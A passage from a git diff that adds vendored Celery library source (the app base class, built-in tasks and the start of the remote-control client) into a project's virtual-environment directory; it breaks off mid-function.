threads.""" + set_default_app(self) + + def _ensure_after_fork(self): + if not self._after_fork_registered: + self._after_fork_registered = True + if register_after_fork is not None: + register_after_fork(self, _after_fork_cleanup_app) + + def close(self): + """Clean up after the application. + + Only necessary for dynamically created apps, and you should + probably use the :keyword:`with` statement instead. + + Example: + >>> with Celery(set_as_current=False) as app: + ... with app.connection_for_write() as conn: + ... pass + """ + self._pool = None + _deregister_app(self) + + def start(self, argv=None): + """Run :program:`celery` using `argv`. + + Uses :data:`sys.argv` if `argv` is not specified. + """ + from celery.bin.celery import celery + + celery.params[0].default = self + + if argv is None: + argv = sys.argv + + try: + celery.main(args=argv, standalone_mode=False) + except Exit as e: + return e.exit_code + finally: + celery.params[0].default = None + + def worker_main(self, argv=None): + """Run :program:`celery worker` using `argv`. + + Uses :data:`sys.argv` if `argv` is not specified. + """ + if argv is None: + argv = sys.argv + + if 'worker' not in argv: + raise ValueError( + "The worker sub-command must be specified in argv.\n" + "Use app.start() to programmatically start other commands." + ) + + self.start(argv=argv) + + def task(self, *args, **opts): + """Decorator to create a task class out of any callable. + + See :ref:`Task options` for a list of the + arguments that can be passed to this decorator. + + Examples: + .. code-block:: python + + @app.task + def refresh_feed(url): + store_feed(feedparser.parse(url)) + + with setting extra options: + + .. code-block:: python + + @app.task(exchange='feeds') + def refresh_feed(url): + return store_feed(feedparser.parse(url)) + + Note: + App Binding: For custom apps the task decorator will return + a proxy object, so that the act of creating the task is not + performed until the task is used or the task registry is accessed. + + If you're depending on binding to be deferred, then you must + not access any attributes on the returned object until the + application is fully set up (finalized). + """ + if USING_EXECV and opts.get('lazy', True): + # When using execv the task in the original module will point to a + # different app, so doing things like 'add.request' will point to + # a different task instance. This makes sure it will always use + # the task instance from the current app. + # Really need a better solution for this :( + from . import shared_task + return shared_task(*args, lazy=False, **opts) + + def inner_create_task_cls(shared=True, filter=None, lazy=True, **opts): + _filt = filter + + def _create_task_cls(fun): + if shared: + def cons(app): + return app._task_from_fun(fun, **opts) + cons.__name__ = fun.__name__ + connect_on_app_finalize(cons) + if not lazy or self.finalized: + ret = self._task_from_fun(fun, **opts) + else: + # return a proxy object that evaluates on first use + ret = PromiseProxy(self._task_from_fun, (fun,), opts, + __doc__=fun.__doc__) + self._pending.append(ret) + if _filt: + return _filt(ret) + return ret + + return _create_task_cls + + if len(args) == 1: + if callable(args[0]): + return inner_create_task_cls(**opts)(*args) + raise TypeError('argument 1 to @task() must be a callable') + if args: + raise TypeError( + '@task() takes exactly 1 argument ({} given)'.format( + sum([len(args), len(opts)]))) + return inner_create_task_cls(**opts) + + def type_checker(self, fun, bound=False): + return staticmethod(head_from_fun(fun, bound=bound)) + + def _task_from_fun(self, fun, name=None, base=None, bind=False, **options): + if not self.finalized and not self.autofinalize: + raise RuntimeError('Contract breach: app not finalized') + name = name or self.gen_task_name(fun.__name__, fun.__module__) + base = base or self.Task + + if name not in self._tasks: + run = fun if bind else staticmethod(fun) + task = type(fun.__name__, (base,), dict({ + 'app': self, + 'name': name, + 'run': run, + '_decorated': True, + '__doc__': fun.__doc__, + '__module__': fun.__module__, + '__annotations__': fun.__annotations__, + '__header__': self.type_checker(fun, bound=bind), + '__wrapped__': run}, **options))() + # for some reason __qualname__ cannot be set in type() + # so we have to set it here. + try: + task.__qualname__ = fun.__qualname__ + except AttributeError: + pass + self._tasks[task.name] = task + task.bind(self) # connects task to this app + add_autoretry_behaviour(task, **options) + else: + task = self._tasks[name] + return task + + def register_task(self, task, **options): + """Utility for registering a task-based class. + + Note: + This is here for compatibility with old Celery 1.0 + style task classes, you should not need to use this for + new projects. + """ + task = inspect.isclass(task) and task() or task + if not task.name: + task_cls = type(task) + task.name = self.gen_task_name( + task_cls.__name__, task_cls.__module__) + add_autoretry_behaviour(task, **options) + self.tasks[task.name] = task + task._app = self + task.bind(self) + return task + + def gen_task_name(self, name, module): + return gen_task_name(self, name, module) + + def finalize(self, auto=False): + """Finalize the app. + + This loads built-in tasks, evaluates pending task decorators, + reads configuration, etc. + """ + with self._finalize_mutex: + if not self.finalized: + if auto and not self.autofinalize: + raise RuntimeError('Contract breach: app not finalized') + self.finalized = True + _announce_app_finalized(self) + + pending = self._pending + while pending: + maybe_evaluate(pending.popleft()) + + for task in self._tasks.values(): + task.bind(self) + + self.on_after_finalize.send(sender=self) + + def add_defaults(self, fun): + """Add default configuration from dict ``d``. + + If the argument is a callable function then it will be regarded + as a promise, and it won't be loaded until the configuration is + actually needed. + + This method can be compared to: + + .. code-block:: pycon + + >>> celery.conf.update(d) + + with a difference that 1) no copy will be made and 2) the dict will + not be transferred when the worker spawns child processes, so + it's important that the same configuration happens at import time + when pickle restores the object on the other side. + """ + if not callable(fun): + d, fun = fun, lambda: d + if self.configured: + return self._conf.add_defaults(fun()) + self._pending_defaults.append(fun) + + def config_from_object(self, obj, + silent=False, force=False, namespace=None): + """Read configuration from object. + + Object is either an actual object or the name of a module to import. + + Example: + >>> celery.config_from_object('myapp.celeryconfig') + + >>> from myapp import celeryconfig + >>> celery.config_from_object(celeryconfig) + + Arguments: + silent (bool): If true then import errors will be ignored. + force (bool): Force reading configuration immediately. + By default the configuration will be read only when required. + """ + self._config_source = obj + self.namespace = namespace or self.namespace + if force or self.configured: + self._conf = None + if self.loader.config_from_object(obj, silent=silent): + return self.conf + + def config_from_envvar(self, variable_name, silent=False, force=False): + """Read configuration from environment variable. + + The value of the environment variable must be the name + of a module to import. + + Example: + >>> os.environ['CELERY_CONFIG_MODULE'] = 'myapp.celeryconfig' + >>> celery.config_from_envvar('CELERY_CONFIG_MODULE') + """ + module_name = os.environ.get(variable_name) + if not module_name: + if silent: + return False + raise ImproperlyConfigured( + ERR_ENVVAR_NOT_SET.strip().format(variable_name)) + return self.config_from_object(module_name, silent=silent, force=force) + + def config_from_cmdline(self, argv, namespace='celery'): + self._conf.update( + self.loader.cmdline_config_parser(argv, namespace) + ) + + def setup_security(self, allowed_serializers=None, key=None, key_password=None, cert=None, + store=None, digest=DEFAULT_SECURITY_DIGEST, + serializer='json'): + """Setup the message-signing serializer. + + This will affect all application instances (a global operation). + + Disables untrusted serializers and if configured to use the ``auth`` + serializer will register the ``auth`` serializer with the provided + settings into the Kombu serializer registry. + + Arguments: + allowed_serializers (Set[str]): List of serializer names, or + content_types that should be exempt from being disabled. + key (str): Name of private key file to use. + Defaults to the :setting:`security_key` setting. + key_password (bytes): Password to decrypt the private key. + Defaults to the :setting:`security_key_password` setting. + cert (str): Name of certificate file to use. + Defaults to the :setting:`security_certificate` setting. + store (str): Directory containing certificates. + Defaults to the :setting:`security_cert_store` setting. + digest (str): Digest algorithm used when signing messages. + Default is ``sha256``. + serializer (str): Serializer used to encode messages after + they've been signed. See :setting:`task_serializer` for + the serializers supported. Default is ``json``. + """ + from celery.security import setup_security + return setup_security(allowed_serializers, key, key_password, cert, + store, digest, serializer, app=self) + + def autodiscover_tasks(self, packages=None, + related_name='tasks', force=False): + """Auto-discover task modules. + + Searches a list of packages for a "tasks.py" module (or use + related_name argument). + + If the name is empty, this will be delegated to fix-ups (e.g., Django). + + For example if you have a directory layout like this: + + .. code-block:: text + + foo/__init__.py + tasks.py + models.py + + bar/__init__.py + tasks.py + models.py + + baz/__init__.py + models.py + + Then calling ``app.autodiscover_tasks(['foo', 'bar', 'baz'])`` will + result in the modules ``foo.tasks`` and ``bar.tasks`` being imported. + + Arguments: + packages (List[str]): List of packages to search. + This argument may also be a callable, in which case the + value returned is used (for lazy evaluation). + related_name (Optional[str]): The name of the module to find. Defaults + to "tasks": meaning "look for 'module.tasks' for every + module in ``packages``.". If ``None`` will only try to import + the package, i.e. "look for 'module'". + force (bool): By default this call is lazy so that the actual + auto-discovery won't happen until an application imports + the default modules. Forcing will cause the auto-discovery + to happen immediately. + """ + if force: + return self._autodiscover_tasks(packages, related_name) + signals.import_modules.connect(starpromise( + self._autodiscover_tasks, packages, related_name, + ), weak=False, sender=self) + + def _autodiscover_tasks(self, packages, related_name, **kwargs): + if packages: + return self._autodiscover_tasks_from_names(packages, related_name) + return self._autodiscover_tasks_from_fixups(related_name) + + def _autodiscover_tasks_from_names(self, packages, related_name): + # packages argument can be lazy + return self.loader.autodiscover_tasks( + packages() if callable(packages) else packages, related_name, + ) + + def _autodiscover_tasks_from_fixups(self, related_name): + return self._autodiscover_tasks_from_names([ + pkg for fixup in self._fixups + if hasattr(fixup, 'autodiscover_tasks') + for pkg in fixup.autodiscover_tasks() + ], related_name=related_name) + + def send_task(self, name, args=None, kwargs=None, countdown=None, + eta=None, task_id=None, producer=None, connection=None, + router=None, result_cls=None, expires=None, + publisher=None, link=None, link_error=None, + add_to_parent=True, group_id=None, group_index=None, + retries=0, chord=None, + reply_to=None, time_limit=None, soft_time_limit=None, + root_id=None, parent_id=None, route_name=None, + shadow=None, chain=None, task_type=None, **options): + """Send task by name. + + Supports the same arguments as :meth:`@-Task.apply_async`. + + Arguments: + name (str): Name of task to call (e.g., `"tasks.add"`). + result_cls (AsyncResult): Specify custom result class. + """ + parent = have_parent = None + amqp = self.amqp + task_id = task_id or uuid() + producer = producer or publisher # XXX compat + router = router or amqp.router + conf = self.conf + if conf.task_always_eager: # pragma: no cover + warnings.warn(AlwaysEagerIgnored( + 'task_always_eager has no effect on send_task', + ), stacklevel=2) + + ignore_result = options.pop('ignore_result', False) + options = router.route( + options, route_name or name, args, kwargs, task_type) + if expires is not None: + if isinstance(expires, datetime): + expires_s = (maybe_make_aware( + expires) - self.now()).total_seconds() + elif isinstance(expires, str): + expires_s = (maybe_make_aware( + datetime.fromisoformat(expires)) - self.now()).total_seconds() + else: + expires_s = expires + + if expires_s < 0: + logger.warning( + f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n" + "We assume this is intended and so we have set the " + "expiration date to 0 instead.\n" + "According to RabbitMQ's documentation:\n" + "\"Setting the TTL to 0 causes messages to be expired upon " + "reaching a queue unless they can be delivered to a " + "consumer immediately.\"\n" + "If this was unintended, please check the code which " + "published this task." + ) + expires_s = 0 + + options["expiration"] = expires_s + + if not root_id or not parent_id: + parent = self.current_worker_task + if parent: + if not root_id: + root_id = parent.request.root_id or parent.request.id + if not parent_id: + parent_id = parent.request.id + + if conf.task_inherit_parent_priority: + options.setdefault('priority', + parent.request.delivery_info.get('priority')) + + # alias for 'task_as_v2' + message = amqp.create_task_message( + task_id, name, args, kwargs, countdown, eta, group_id, group_index, + expires, retries, chord, + maybe_list(link), maybe_list(link_error), + reply_to or self.thread_oid, time_limit, soft_time_limit, + self.conf.task_send_sent_event, + root_id, parent_id, shadow, chain, + ignore_result=ignore_result, + **options + ) + + stamped_headers = options.pop('stamped_headers', []) + for stamp in stamped_headers: + options.pop(stamp) + + if connection: + producer = amqp.Producer(connection, auto_declare=False) + + with self.producer_or_acquire(producer) as P: + with P.connection._reraise_as_library_errors(): + if not ignore_result: + self.backend.on_task_call(P, task_id) + amqp.send_task_message(P, name, message, **options) + result = (result_cls or self.AsyncResult)(task_id) + # We avoid using the constructor since a custom result class + # can be used, in which case the constructor may still use + # the old signature. + result.ignored = ignore_result + + if add_to_parent: + if not have_parent: + parent, have_parent = self.current_worker_task, True + if parent: + parent.add_trail(result) + return result + + def connection_for_read(self, url=None, **kwargs): + """Establish connection used for consuming. + + See Also: + :meth:`connection` for supported arguments. + """ + return self._connection(url or self.conf.broker_read_url, **kwargs) + + def connection_for_write(self, url=None, **kwargs): + """Establish connection used for producing. + + See Also: + :meth:`connection` for supported arguments. + """ + return self._connection(url or self.conf.broker_write_url, **kwargs) + + def connection(self, hostname=None, userid=None, password=None, + virtual_host=None, port=None, ssl=None, + connect_timeout=None, transport=None, + transport_options=None, heartbeat=None, + login_method=None, failover_strategy=None, **kwargs): + """Establish a connection to the message broker. + + Please use :meth:`connection_for_read` and + :meth:`connection_for_write` instead, to convey the intent + of use for this connection. + + Arguments: + url: Either the URL or the hostname of the broker to use. + hostname (str): URL, Hostname/IP-address of the broker. + If a URL is used, then the other argument below will + be taken from the URL instead. + userid (str): Username to authenticate as. + password (str): Password to authenticate with + virtual_host (str): Virtual host to use (domain). + port (int): Port to connect to. + ssl (bool, Dict): Defaults to the :setting:`broker_use_ssl` + setting. + transport (str): defaults to the :setting:`broker_transport` + setting. + transport_options (Dict): Dictionary of transport specific options. + heartbeat (int): AMQP Heartbeat in seconds (``pyamqp`` only). + login_method (str): Custom login method to use (AMQP only). + failover_strategy (str, Callable): Custom failover strategy. + **kwargs: Additional arguments to :class:`kombu.Connection`. + + Returns: + kombu.Connection: the lazy connection instance. + """ + return self.connection_for_write( + hostname or self.conf.broker_write_url, + userid=userid, password=password, + virtual_host=virtual_host, port=port, ssl=ssl, + connect_timeout=connect_timeout, transport=transport, + transport_options=transport_options, heartbeat=heartbeat, + login_method=login_method, failover_strategy=failover_strategy, + **kwargs + ) + + def _connection(self, url, userid=None, password=None, + virtual_host=None, port=None, ssl=None, + connect_timeout=None, transport=None, + transport_options=None, heartbeat=None, + login_method=None, failover_strategy=None, **kwargs): + conf = self.conf + return self.amqp.Connection( + url, + userid or conf.broker_user, + password or conf.broker_password, + virtual_host or conf.broker_vhost, + port or conf.broker_port, + transport=transport or conf.broker_transport, + ssl=self.either('broker_use_ssl', ssl), + heartbeat=heartbeat, + login_method=login_method or conf.broker_login_method, + failover_strategy=( + failover_strategy or conf.broker_failover_strategy + ), + transport_options=dict( + conf.broker_transport_options, **transport_options or {} + ), + connect_timeout=self.either( + 'broker_connection_timeout', connect_timeout + ), + ) + broker_connection = connection + + def _acquire_connection(self, pool=True): + """Helper for :meth:`connection_or_acquire`.""" + if pool: + return self.pool.acquire(block=True) + return self.connection_for_write() + + def connection_or_acquire(self, connection=None, pool=True, *_, **__): + """Context used to acquire a connection from the pool. + + For use within a :keyword:`with` statement to get a connection + from the pool if one is not already provided. + + Arguments: + connection (kombu.Connection): If not provided, a connection + will be acquired from the connection pool. + """ + return FallbackContext(connection, self._acquire_connection, pool=pool) + default_connection = connection_or_acquire # XXX compat + + def producer_or_acquire(self, producer=None): + """Context used to acquire a producer from the pool. + + For use within a :keyword:`with` statement to get a producer + from the pool if one is not already provided + + Arguments: + producer (kombu.Producer): If not provided, a producer + will be acquired from the producer pool. + """ + return FallbackContext( + producer, self.producer_pool.acquire, block=True, + ) + default_producer = producer_or_acquire # XXX compat + + def prepare_config(self, c): + """Prepare configuration before it is merged with the defaults.""" + return find_deprecated_settings(c) + + def now(self): + """Return the current time and date as a datetime.""" + now_in_utc = to_utc(datetime.utcnow()) + return now_in_utc.astimezone(self.timezone) + + def select_queues(self, queues=None): + """Select subset of queues. + + Arguments: + queues (Sequence[str]): a list of queue names to keep. + """ + return self.amqp.queues.select(queues) + + def either(self, default_key, *defaults): + """Get key from configuration or use default values. + + Fallback to the value of a configuration key if none of the + `*values` are true. + """ + return first(None, [ + first(None, defaults), starpromise(self.conf.get, default_key), + ]) + + def bugreport(self): + """Return information useful in bug reports.""" + return bugreport(self) + + def _get_backend(self): + backend, url = backends.by_url( + self.backend_cls or self.conf.result_backend, + self.loader) + return backend(app=self, url=url) + + def _finalize_pending_conf(self): + """Get config value by key and finalize loading the configuration. + + Note: + This is used by PendingConfiguration: + as soon as you access a key the configuration is read. + """ + conf = self._conf = self._load_config() + return conf + + def _load_config(self): + if isinstance(self.on_configure, Signal): + self.on_configure.send(sender=self) + else: + # used to be a method pre 4.0 + self.on_configure() + if self._config_source: + self.loader.config_from_object(self._config_source) + self.configured = True + settings = detect_settings( + self.prepare_config(self.loader.conf), self._preconf, + ignore_keys=self._preconf_set_by_auto, prefix=self.namespace, + ) + if self._conf is not None: + # replace in place, as someone may have referenced app.conf, + # done some changes, accessed a key, and then try to make more + # changes to the reference and not the finalized value. + self._conf.swap_with(settings) + else: + self._conf = settings + + # load lazy config dict initializers. + pending_def = self._pending_defaults + while pending_def: + self._conf.add_defaults(maybe_evaluate(pending_def.popleft()())) + + # load lazy periodic tasks + pending_beat = self._pending_periodic_tasks + while pending_beat: + periodic_task_args, periodic_task_kwargs = pending_beat.popleft() + self._add_periodic_task(*periodic_task_args, **periodic_task_kwargs) + + self.on_after_configure.send(sender=self, source=self._conf) + return self._conf + + def _after_fork(self): + self._pool = None + try: + self.__dict__['amqp']._producer_pool = None + except (AttributeError, KeyError): + pass + self.on_after_fork.send(sender=self) + + def signature(self, *args, **kwargs): + """Return a new :class:`~celery.Signature` bound to this app.""" + kwargs['app'] = self + return self._canvas.signature(*args, **kwargs) + + def add_periodic_task(self, schedule, sig, + args=(), kwargs=(), name=None, **opts): + """ + Add a periodic task to beat schedule. + + Celery beat store tasks based on `sig` or `name` if provided. Adding the + same signature twice make the second task override the first one. To + avoid the override, use distinct `name` for them. + """ + key, entry = self._sig_to_periodic_task_entry( + schedule, sig, args, kwargs, name, **opts) + if self.configured: + self._add_periodic_task(key, entry, name=name) + else: + self._pending_periodic_tasks.append([(key, entry), {"name": name}]) + return key + + def _sig_to_periodic_task_entry(self, schedule, sig, + args=(), kwargs=None, name=None, **opts): + kwargs = {} if not kwargs else kwargs + sig = (sig.clone(args, kwargs) + if isinstance(sig, abstract.CallableSignature) + else self.signature(sig.name, args, kwargs)) + return name or repr(sig), { + 'schedule': schedule, + 'task': sig.name, + 'args': sig.args, + 'kwargs': sig.kwargs, + 'options': dict(sig.options, **opts), + } + + def _add_periodic_task(self, key, entry, name=None): + if name is None and key in self._conf.beat_schedule: + logger.warning( + f"Periodic task key='{key}' shadowed a previous unnamed periodic task." + " Pass a name kwarg to add_periodic_task to silence this warning." + ) + + self._conf.beat_schedule[key] = entry + + def create_task_cls(self): + """Create a base task class bound to this app.""" + return self.subclass_with_self( + self.task_cls, name='Task', attribute='_app', + keep_reduce=True, abstract=True, + ) + + def subclass_with_self(self, Class, name=None, attribute='app', + reverse=None, keep_reduce=False, **kw): + """Subclass an app-compatible class. + + App-compatible means that the class has a class attribute that + provides the default app it should use, for example: + ``class Foo: app = None``. + + Arguments: + Class (type): The app-compatible class to subclass. + name (str): Custom name for the target class. + attribute (str): Name of the attribute holding the app, + Default is 'app'. + reverse (str): Reverse path to this object used for pickling + purposes. For example, to get ``app.AsyncResult``, + use ``"AsyncResult"``. + keep_reduce (bool): If enabled a custom ``__reduce__`` + implementation won't be provided. + """ + Class = symbol_by_name(Class) + reverse = reverse if reverse else Class.__name__ + + def __reduce__(self): + return _unpickle_appattr, (reverse, self.__reduce_args__()) + + attrs = dict( + {attribute: self}, + __module__=Class.__module__, + __doc__=Class.__doc__, + **kw) + if not keep_reduce: + attrs['__reduce__'] = __reduce__ + + return type(name or Class.__name__, (Class,), attrs) + + def _rgetattr(self, path): + return attrgetter(path)(self) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + def __repr__(self): + return f'<{type(self).__name__} {appstr(self)}>' + + def __reduce__(self): + if self._using_v1_reduce: + return self.__reduce_v1__() + return (_unpickle_app_v2, (self.__class__, self.__reduce_keys__())) + + def __reduce_v1__(self): + # Reduce only pickles the configuration changes, + # so the default configuration doesn't have to be passed + # between processes. + return ( + _unpickle_app, + (self.__class__, self.Pickler) + self.__reduce_args__(), + ) + + def __reduce_keys__(self): + """Keyword arguments used to reconstruct the object when unpickling.""" + return { + 'main': self.main, + 'changes': + self._conf.changes if self.configured else self._preconf, + 'loader': self.loader_cls, + 'backend': self.backend_cls, + 'amqp': self.amqp_cls, + 'events': self.events_cls, + 'log': self.log_cls, + 'control': self.control_cls, + 'fixups': self.fixups, + 'config_source': self._config_source, + 'task_cls': self.task_cls, + 'namespace': self.namespace, + } + + def __reduce_args__(self): + """Deprecated method, please use :meth:`__reduce_keys__` instead.""" + return (self.main, self._conf.changes if self.configured else {}, + self.loader_cls, self.backend_cls, self.amqp_cls, + self.events_cls, self.log_cls, self.control_cls, + False, self._config_source) + + @cached_property + def Worker(self): + """Worker application. + + See Also: + :class:`~@Worker`. + """ + return self.subclass_with_self('celery.apps.worker:Worker') + + @cached_property + def WorkController(self, **kwargs): + """Embeddable worker. + + See Also: + :class:`~@WorkController`. + """ + return self.subclass_with_self('celery.worker:WorkController') + + @cached_property + def Beat(self, **kwargs): + """:program:`celery beat` scheduler application. + + See Also: + :class:`~@Beat`. + """ + return self.subclass_with_self('celery.apps.beat:Beat') + + @cached_property + def Task(self): + """Base task class for this app.""" + return self.create_task_cls() + + @cached_property + def annotations(self): + return prepare_annotations(self.conf.task_annotations) + + @cached_property + def AsyncResult(self): + """Create new result instance. + + See Also: + :class:`celery.result.AsyncResult`. + """ + return self.subclass_with_self('celery.result:AsyncResult') + + @cached_property + def ResultSet(self): + return self.subclass_with_self('celery.result:ResultSet') + + @cached_property + def GroupResult(self): + """Create new group result instance. + + See Also: + :class:`celery.result.GroupResult`. + """ + return self.subclass_with_self('celery.result:GroupResult') + + @property + def pool(self): + """Broker connection pool: :class:`~@pool`. + + Note: + This attribute is not related to the workers concurrency pool. + """ + if self._pool is None: + self._ensure_after_fork() + limit = self.conf.broker_pool_limit + pools.set_limit(limit) + self._pool = pools.connections[self.connection_for_write()] + return self._pool + + @property + def current_task(self): + """Instance of task being executed, or :const:`None`.""" + return _task_stack.top + + @property + def current_worker_task(self): + """The task currently being executed by a worker or :const:`None`. + + Differs from :data:`current_task` in that it's not affected + by tasks calling other tasks directly, or eagerly. + """ + return get_current_worker_task() + + @cached_property + def oid(self): + """Universally unique identifier for this app.""" + # since 4.0: thread.get_ident() is not included when + # generating the process id. This is due to how the RPC + # backend now dedicates a single thread to receive results, + # which would not work if each thread has a separate id. + return oid_from(self, threads=False) + + @property + def thread_oid(self): + """Per-thread unique identifier for this app.""" + try: + return self._local.oid + except AttributeError: + self._local.oid = new_oid = oid_from(self, threads=True) + return new_oid + + @cached_property + def amqp(self): + """AMQP related functionality: :class:`~@amqp`.""" + return instantiate(self.amqp_cls, app=self) + + @property + def _backend(self): + """A reference to the backend object + + Uses self._backend_cache if it is thread safe. + Otherwise, use self._local + """ + if self._backend_cache is not None: + return self._backend_cache + return getattr(self._local, "backend", None) + + @_backend.setter + def _backend(self, backend): + """Set the backend object on the app""" + if backend.thread_safe: + self._backend_cache = backend + else: + self._local.backend = backend + + @property + def backend(self): + """Current backend instance.""" + if self._backend is None: + self._backend = self._get_backend() + return self._backend + + @property + def conf(self): + """Current configuration.""" + if self._conf is None: + self._conf = self._load_config() + return self._conf + + @conf.setter + def conf(self, d): + self._conf = d + + @cached_property + def control(self): + """Remote control: :class:`~@control`.""" + return instantiate(self.control_cls, app=self) + + @cached_property + def events(self): + """Consuming and sending events: :class:`~@events`.""" + return instantiate(self.events_cls, app=self) + + @cached_property + def loader(self): + """Current loader instance.""" + return get_loader_cls(self.loader_cls)(app=self) + + @cached_property + def log(self): + """Logging: :class:`~@log`.""" + return instantiate(self.log_cls, app=self) + + @cached_property + def _canvas(self): + from celery import canvas + return canvas + + @cached_property + def tasks(self): + """Task registry. + + Warning: + Accessing this attribute will also auto-finalize the app. + """ + self.finalize(auto=True) + return self._tasks + + @property + def producer_pool(self): + return self.amqp.producer_pool + + def uses_utc_timezone(self): + """Check if the application uses the UTC timezone.""" + return self.timezone == timezone.utc + + @cached_property + def timezone(self): + """Current timezone for this app. + + This is a cached property taking the time zone from the + :setting:`timezone` setting. + """ + conf = self.conf + if not conf.timezone: + if conf.enable_utc: + return timezone.utc + else: + return timezone.local + return timezone.get_timezone(conf.timezone) + + +App = Celery # XXX compat diff --git a/env/Lib/site-packages/celery/app/builtins.py b/env/Lib/site-packages/celery/app/builtins.py new file mode 100644 index 00000000..1a79c409 --- /dev/null +++ b/env/Lib/site-packages/celery/app/builtins.py @@ -0,0 +1,187 @@ +"""Built-in Tasks. + +The built-in tasks are always available in all app instances. +""" +from celery._state import connect_on_app_finalize +from celery.utils.log import get_logger + +__all__ = () +logger = get_logger(__name__) + + +@connect_on_app_finalize +def add_backend_cleanup_task(app): + """Task used to clean up expired results. + + If the configured backend requires periodic cleanup this task is also + automatically configured to run every day at 4am (requires + :program:`celery beat` to be running). + """ + @app.task(name='celery.backend_cleanup', shared=False, lazy=False) + def backend_cleanup(): + app.backend.cleanup() + return backend_cleanup + + +@connect_on_app_finalize +def add_accumulate_task(app): + """Task used by Task.replace when replacing task with group.""" + @app.task(bind=True, name='celery.accumulate', shared=False, lazy=False) + def accumulate(self, *args, **kwargs): + index = kwargs.get('index') + return args[index] if index is not None else args + return accumulate + + +@connect_on_app_finalize +def add_unlock_chord_task(app): + """Task used by result backends without native chord support. + + Will joins chord by creating a task chain polling the header + for completion. + """ + from celery.canvas import maybe_signature + from celery.exceptions import ChordError + from celery.result import allow_join_result, result_from_tuple + + @app.task(name='celery.chord_unlock', max_retries=None, shared=False, + default_retry_delay=app.conf.result_chord_retry_interval, ignore_result=True, lazy=False, bind=True) + def unlock_chord(self, group_id, callback, interval=None, + max_retries=None, result=None, + Result=app.AsyncResult, GroupResult=app.GroupResult, + result_from_tuple=result_from_tuple, **kwargs): + if interval is None: + interval = self.default_retry_delay + + # check if the task group is ready, and if so apply the callback. + callback = maybe_signature(callback, app) + deps = GroupResult( + group_id, + [result_from_tuple(r, app=app) for r in result], + app=app, + ) + j = deps.join_native if deps.supports_native_join else deps.join + + try: + ready = deps.ready() + except Exception as exc: + raise self.retry( + exc=exc, countdown=interval, max_retries=max_retries, + ) + else: + if not ready: + raise self.retry(countdown=interval, max_retries=max_retries) + + callback = maybe_signature(callback, app=app) + try: + with allow_join_result(): + ret = j( + timeout=app.conf.result_chord_join_timeout, + propagate=True, + ) + except Exception as exc: # pylint: disable=broad-except + try: + culprit = next(deps._failed_join_report()) + reason = f'Dependency {culprit.id} raised {exc!r}' + except StopIteration: + reason = repr(exc) + logger.exception('Chord %r raised: %r', group_id, exc) + app.backend.chord_error_from_stack(callback, ChordError(reason)) + else: + try: + callback.delay(ret) + except Exception as exc: # pylint: disable=broad-except + logger.exception('Chord %r raised: %r', group_id, exc) + app.backend.chord_error_from_stack( + callback, + exc=ChordError(f'Callback error: {exc!r}'), + ) + return unlock_chord + + +@connect_on_app_finalize +def add_map_task(app): + from celery.canvas import signature + + @app.task(name='celery.map', shared=False, lazy=False) + def xmap(task, it): + task = signature(task, app=app).type + return [task(item) for item in it] + return xmap + + +@connect_on_app_finalize +def add_starmap_task(app): + from celery.canvas import signature + + @app.task(name='celery.starmap', shared=False, lazy=False) + def xstarmap(task, it): + task = signature(task, app=app).type + return [task(*item) for item in it] + return xstarmap + + +@connect_on_app_finalize +def add_chunk_task(app): + from celery.canvas import chunks as _chunks + + @app.task(name='celery.chunks', shared=False, lazy=False) + def chunks(task, it, n): + return _chunks.apply_chunks(task, it, n) + return chunks + + +@connect_on_app_finalize +def add_group_task(app): + """No longer used, but here for backwards compatibility.""" + from celery.canvas import maybe_signature + from celery.result import result_from_tuple + + @app.task(name='celery.group', bind=True, shared=False, lazy=False) + def group(self, tasks, result, group_id, partial_args, add_to_parent=True): + app = self.app + result = result_from_tuple(result, app) + # any partial args are added to all tasks in the group + taskit = (maybe_signature(task, app=app).clone(partial_args) + for i, task in enumerate(tasks)) + with app.producer_or_acquire() as producer: + [stask.apply_async(group_id=group_id, producer=producer, + add_to_parent=False) for stask in taskit] + parent = app.current_worker_task + if add_to_parent and parent: + parent.add_trail(result) + return result + return group + + +@connect_on_app_finalize +def add_chain_task(app): + """No longer used, but here for backwards compatibility.""" + @app.task(name='celery.chain', shared=False, lazy=False) + def chain(*args, **kwargs): + raise NotImplementedError('chain is not a real task') + return chain + + +@connect_on_app_finalize +def add_chord_task(app): + """No longer used, but here for backwards compatibility.""" + from celery import chord as _chord + from celery import group + from celery.canvas import maybe_signature + + @app.task(name='celery.chord', bind=True, ignore_result=False, + shared=False, lazy=False) + def chord(self, header, body, partial_args=(), interval=None, + countdown=1, max_retries=None, eager=False, **kwargs): + app = self.app + # - convert back to group if serialized + tasks = header.tasks if isinstance(header, group) else header + header = group([ + maybe_signature(s, app=app) for s in tasks + ], app=self.app) + body = maybe_signature(body, app=app) + ch = _chord(header, body) + return ch.run(header, body, partial_args, app, interval, + countdown, max_retries, **kwargs) + return chord diff --git a/env/Lib/site-packages/celery/app/control.py b/env/Lib/site-packages/celery/app/control.py new file mode 100644 index 00000000..52763e8a --- /dev/null +++ b/env/Lib/site-packages/celery/app/control.py @@ -0,0 +1,779 @@ +"""Worker Remote Control Client. + +Client for worker remote control commands. +Server implementation is in :mod:`celery.worker.control`. +There are two types of remote control commands: + +* Inspect commands: Does not have side effects, will usually just return some value + found in the worker, like the list of currently registered tasks, the list of active tasks, etc. + Commands are accessible via :class:`Inspect` class. + +* Control commands: Performs side effects, like adding a new queue to consume from. + Commands are accessible via :class:`Control` class. +""" +import warnings + +from billiard.common import TERM_SIGNAME +from kombu.matcher import match +from kombu.pidbox import Mailbox +from kombu.utils.compat import register_after_fork +from kombu.utils.functional import lazy +from kombu.utils.objects import cached_property + +from celery.exceptions import DuplicateNodenameWarning +from celery.utils.log import get_logger +from celery.utils.text import pluralize + +__all__ = ('Inspect', 'Control', 'flatten_reply') + +logger = get_logger(__name__) + +W_DUPNODE = """\ +Received multiple replies from node {0}: {1}. +Please make sure you give each node a unique nodename using +the celery worker `-n` option.\ +""" + + +def flatten_reply(reply): + """Flatten node replies. + + Convert from a list of replies in this format:: + + [{'a@example.com': reply}, + {'b@example.com': reply}] + + into this format:: + + {'a@example.com': reply, + 'b@example.com': reply} + """ + nodes, dupes = {}, set() + for item in reply: + [dupes.add(name) for name in item if name in nodes] + nodes.update(item) + if dupes: + warnings.warn(DuplicateNodenameWarning( + W_DUPNODE.format( + pluralize(len(dupes), 'name'), ', '.join(sorted(dupes)), + ), + )) + return nodes + + +def _after_fork_cleanup_control(control): + try: + control._after_fork() + except Exception as exc: # pylint: disable=broad-except + 